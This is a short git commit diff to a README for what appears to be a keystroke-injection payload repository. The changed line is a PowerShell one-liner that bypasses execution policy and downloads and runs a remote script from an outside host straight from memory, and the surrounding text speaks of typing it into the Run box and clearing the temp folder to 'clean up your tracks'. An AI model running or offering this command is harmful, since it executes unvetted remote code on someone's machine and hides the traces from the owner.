Update ReadMe.md

This commit is contained in:
I-Am-Jakoby 2023-01-01 17:19:50 -06:00 committed by GitHub
parent 4f3587553a
commit e05ae050f3
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -38,7 +38,7 @@ Lastly, to clean up your tracks behind you, the tmp folder will be emptied and t
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
* Place your images URL in the $url variable
```
powershell -noexit -NoP -NonI -Exec Bypass $url='URL-HERE';iwr jakoby.lol/pkw | iex
powershell -noexit -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>